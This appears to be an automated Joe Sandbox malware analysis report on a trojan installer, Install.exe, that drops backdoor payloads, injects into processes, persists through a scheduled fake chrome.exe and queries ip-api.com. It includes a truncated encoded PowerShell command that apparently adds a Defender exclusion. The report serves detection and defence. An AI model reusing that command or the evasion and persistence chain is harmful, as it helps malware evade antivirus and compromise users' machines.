Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000C920 cpuid 22_2_000000014000C920
Source: C:\Users\user\AppData\Roaming\34432.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400029E8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,22_2_00000001400029E8
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,39_2_0000000140001F00
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts111
Windows Management Instrumentation		11
Scheduled Task/Job		1
Access Token Manipulation		1
Disable or Modify Tools		1
Credential API Hooking		1
System Time Discovery		Remote Services11
Archive Collected Data		Exfiltration Over Other Network Medium1
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts11
Native API		Boot or Logon Initialization Scripts512
Process Injection		21
Deobfuscate/Decode Files or Information		LSASS Memory2
File and Directory Discovery		Remote Desktop Protocol1
Credential API Hooking		Exfiltration Over Bluetooth1
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts21
Command and Scripting Interpreter		Logon Script (Windows)11
Scheduled Task/Job		2
Obfuscated Files or Information		Security Account Manager26
System Information Discovery		SMB/Windows Admin Shares1
Clipboard Data		Automated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts11
Scheduled Task/Job		Logon Script (Mac)Logon Script (Mac)22
Software Packing		NTDS1
Query Registry		Distributed Component Object ModelInput CaptureScheduled Transfer2
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud Accounts1
PowerShell		Network Logon ScriptNetwork Logon Script1
File Deletion		LSA Secrets23
Security Software Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common4
Rootkit		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items111
Masquerading		DCSync131
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
Modify Registry		Proc Filesystem1
Application Window Discovery		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)131
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadow1
Remote System Discovery		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
Access Token Manipulation		Network Sniffing1
System Network Configuration Discovery		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron512
Process Injection		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
Hidden Files and Directories		KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 597646 Sample: Install.exe Startdate: 27/03/2022 Architecture: WINDOWS Score: 100 84 Multi AV Scanner detection for submitted file 2->84 86 .NET source code contains potential unpacker 2->86 88 .NET source code references suspicious native API functions 2->88 90 8 other signatures 2->90 10 Install.exe 9 2->10         started        13 powershell.exe 2->13         started        16 chrome.exe 2->16         started        18 powershell.exe 2->18         started        process3 file4 78 C:\...\ChiefKeefofficialnaxyi_crypted(6).exe, PE32 10->78 dropped 80 C:\Users\user\AppData\Roaming\34432.exe, PE32+ 10->80 dropped 20 34432.exe 5 10->20         started        24 ChiefKeefofficialnaxyi_crypted(6).exe 1 10->24         started        122 Creates files in the system32 config directory 13->122 124 Writes to foreign memory regions 13->124 126 Modifies the context of a thread in another process (thread injection) 13->126 128 Injects a PE file into a foreign processes 13->128 26 dllhost.exe 13->26         started        28 conhost.exe 13->28         started        130 Antivirus detection for dropped file 16->130 132 Multi AV Scanner detection for dropped file 16->132 134 Machine Learning detection for dropped file 16->134 30 cmd.exe 16->30         started        136 Found suspicious powershell code related to unpacking or dynamic code loading 18->136 32 conhost.exe 18->32         started        signatures5 process6 file7 76 C:\Users\user\AppData\Roaming\...\chrome.exe, PE32+ 20->76 dropped 102 Antivirus detection for dropped file 20->102 104 Multi AV Scanner detection for dropped file 20->104 106 Machine Learning detection for dropped file 20->106 118 2 other signatures 20->118 34 cmd.exe 20->34         started        36 cmd.exe 1 20->36         started        39 cmd.exe 20->39         started        41 nslookup.exe 20->41         started        108 Writes to foreign memory regions 24->108 110 Allocates memory in foreign processes 24->110 112 Injects a PE file into a foreign processes 24->112 43 AppLaunch.exe 15 3 24->43         started        46 conhost.exe 24->46         started        114 Creates a thread in another existing process (thread injection) 26->114 52 5 other processes 26->52 116 Encrypted powershell cmdline option found 30->116 48 powershell.exe 30->48         started        50 conhost.exe 30->50         started        signatures8 process9 dnsIp10 54 chrome.exe 34->54         started        56 conhost.exe 34->56         started        92 Encrypted powershell cmdline option found 36->92 94 Uses schtasks.exe or at.exe to add and modify task schedules 36->94 58 powershell.exe 19 36->58         started        60 powershell.exe 23 36->60         started        62 conhost.exe 36->62         started        64 conhost.exe 39->64         started        66 schtasks.exe 39->66         started        82 ip-api.com 208.95.112.1, 49735, 80 TUT-ASUS United States 43->82 96 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 43->96 98 Found suspicious powershell code related to unpacking or dynamic code loading 48->98 signatures11 process12 process13 68 cmd.exe 54->68         started        signatures14 100 Encrypted powershell cmdline option found 68->100 71 powershell.exe 68->71         started        74 conhost.exe 68->74         started        process15 signatures16 120 Found suspicious powershell code related to unpacking or dynamic code loading 71->120

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Install.exe41%VirustotalBrowse
Install.exe73%ReversingLabsWin32.Trojan.Zenpak

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\34432.exe100%AviraHEUR/AGEN.1221921
C:\Users\user\AppData\Roaming\Chrome\chrome.exe100%AviraHEUR/AGEN.1221921
C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\34432.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Chrome\chrome.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\34432.exe35%VirustotalBrowse
C:\Users\user\AppData\Roaming\34432.exe77%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe50%VirustotalBrowse
C:\Users\user\AppData\Roaming\Chrome\chrome.exe77%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
22.0.nslookup.exe.140000000.2.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.10.unpack100%AviraRKIT/Agent.avsktDownload File
22.0.nslookup.exe.140000000.0.unpack100%AviraTR/Injector.vwkttDownload File
22.0.nslookup.exe.140000000.8.unpack100%AviraTR/Injector.vwkttDownload File
2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack100%AviraHEUR/AGEN.1203048Download File
39.0.dllhost.exe.140000000.3.unpack100%AviraRKIT/Agent.avsktDownload File
33.2.chrome.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1221921Download File
22.0.nslookup.exe.140000000.1.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.4.unpack100%AviraRKIT/Agent.avsktDownload File
30.2.chrome.exe.20000.0.unpack100%AviraHEUR/AGEN.1221921Download File
30.0.chrome.exe.20000.0.unpack100%AviraHEUR/AGEN.1221921Download File
22.0.nslookup.exe.140000000.5.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.1.unpack100%AviraRKIT/Agent.avsktDownload File
39.0.dllhost.exe.140000000.8.unpack100%AviraRKIT/Agent.avsktDownload File
4.0.34432.exe.770000.0.unpack100%AviraHEUR/AGEN.1221921Download File
22.2.nslookup.exe.140000000.0.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.5.unpack100%AviraRKIT/Agent.avsktDownload File
33.0.chrome.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1221921Download File
5.2.AppLaunch.exe.400000.0.unpack100%AviraHEUR/AGEN.1203048Download File
4.2.34432.exe.770000.0.unpack100%AviraHEUR/AGEN.1221921Download File
39.2.dllhost.exe.140000000.0.unpack100%AviraRKIT/Agent.avsktDownload File
39.0.dllhost.exe.140000000.12.unpack100%AviraRKIT/Agent.avsktDownload File
22.0.nslookup.exe.140000000.6.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.0.unpack100%AviraRKIT/Agent.avsktDownload File
22.0.nslookup.exe.140000000.10.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.6.unpack100%AviraRKIT/Agent.avsktDownload File
22.0.nslookup.exe.140000000.12.unpack100%AviraTR/Injector.vwkttDownload File
22.0.nslookup.exe.140000000.3.unpack100%AviraTR/Injector.vwkttDownload File
22.0.nslookup.exe.140000000.4.unpack100%AviraTR/Injector.vwkttDownload File
39.0.dllhost.exe.140000000.2.unpack100%AviraRKIT/Agent.avsktDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://ip-api.com4Uk0%Avira URL Cloudsafe
http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHM0%Avira URL Cloudsafe
http://crl.mp0%VirustotalBrowse
http://crl.mp0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ip-api.com
208.95.112.1
truefalse
    		high

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://ip-api.com/line/?fields=hostingfalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://ip-api.com4UkAppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://crl.mpowershell-EncodedCommandQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMpowershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://crl.mppowershell.exe, 00000026.00000003.472356728.00000283B87D2000.00000004.00000020.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://go.micropowershell.exe, 00000008.00000002.298759051.000001FF53502000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.299698983.000001FF5367C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.300217713.000001FF53864000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.493191066.00000283A1A2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.422394060.00000283A2335000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000003.423315665.00000283A242E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.291719056.000001FF52214000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.485582465.00000283A0A44000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.301149982.000001FF61EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.461611768.000002C890060000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://ip-api.comAppLaunch.exe, 00000005.00000002.512763531.0000000006D47000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://contoso.com/Iconpowershell.exe, 00000026.00000002.497193020.00000283B0710000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.codeplex.com/DotNetZipAppLaunch.exe, 00000005.00000002.505647974.0000000000402000.00000020.00000400.00020000.00000000.sdmpfalse
                    		high
                    http://nsis.sf.net/NSIS_ErrorErrorInstall.exe, 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Install.exe, 00000001.00000000.217633196.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name34432.exe, 00000004.00000002.356979000.00000000039F5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.512163132.0000000006CE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.288800846.000001FF51E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.430121118.000002C880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.477975029.00000283A06B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://github.com/Pester/Pesterpowershell.exe, 00000019.00000002.435620250.000002C8806DF000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          208.95.112.1
                          		ip-api.comUnited States
                          		53334TUT-ASUSfalse

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:597646
                          Start date and time:2022-03-27 00:39:51 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 14m 0s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:Install.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:46
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:5
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@44/26@1/1
                          EGA Information:
                          • Successful, ratio: 57.1%
                          HDC Information:
                          • Successful, ratio: 51.9% (good quality ratio 43.1%)
                          • Quality average: 58.5%
                          • Quality standard deviation: 36.7%
                          HCA Information:
                          • Successful, ratio: 71%
                          • Number of executed functions: 265
                          • Number of non-executed functions: 190
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe

                          Warnings

                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 52.242.101.226, 40.125.122.176, 20.54.110.249, 52.152.110.14
                          • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Execution Graph export aborted for target 34432.exe, PID 6836 because it is empty
                          • Execution Graph export aborted for target chrome.exe, PID 5460 because it is empty
                          • Execution Graph export aborted for target chrome.exe, PID 6564 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 6940 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7048 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          01:41:04API Interceptor123x Sleep call for process: powershell.exe modified
                          01:41:33API Interceptor2x Sleep call for process: 34432.exe modified
                          01:41:47Task SchedulerRun new task: chrome path: C:\Users\user\AppData\Roaming\Chrome\chrome.exe

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASNs

                          No context

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\34432.exe.log

                          Download File
                          Process:C:\Users\user\AppData\Roaming\34432.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):973
                          Entropy (8bit):5.374440234733254
                          Encrypted:false
                          SSDEEP:12:Q3La/hVAWDLI4MWuCqDLI4MWuPTxAI51KDLI4MN5P6D1BakvoDLI4MWuPak2kL0Q:MLqE4K5E4KrL1qE4GiD0E4KeGasXE4+Y
                          MD5:06639220FD6B2DCCDA25EAE889B6BCC8
                          SHA1:3EDFCBE94838702A978D3D518B2358560A296FD0
                          SHA-256:32F1B0CAE8509079F3F044C5655800CD760DB66E792B451DF2C919B6129DCB83
                          SHA-512:61EBE07C66BA18BE8838223D7946EA14DAF46CE3CEB1F27A59958857B22F00E2EF872A56D7D05C58747D57558BD07D4B097B604CA34D280B6761F3024A20A53F
                          Malicious:false
                          Reputation:unknown
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0f4eb5b1d0857aabc3e7dd079735875\System.Management.ni.dll",0..

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):18817
                          Entropy (8bit):5.004929862695359
                          Encrypted:false
                          SSDEEP:384:Kwib4LEVoGIpN6KQkj2jkjh4iUxLzp0ifOdBVNXp5xvOjJpYoY4Qib4w:KEEV3IpNBQkj22h4iUxLzp0ifOdBVNZY
                          MD5:DA4B150893016C59B1E5DE988406A425
                          SHA1:9CAF9C1A8F844A0FA8D88DC30F29BE7B023E7079
                          SHA-256:5107772D1007FD535B026DF52ADF8864E7C2D4C1ACAB3CD03A5C112517A426DF
                          SHA-512:533A894A8EBB39BF2D785C8E715615A994DF6D797650FCD1D7A3949C90F2682B24BFA596BD2CED15B7BA8817483E68D96D968AC64D784176D53584A116ECEDE0
                          Malicious:false
                          Reputation:unknown
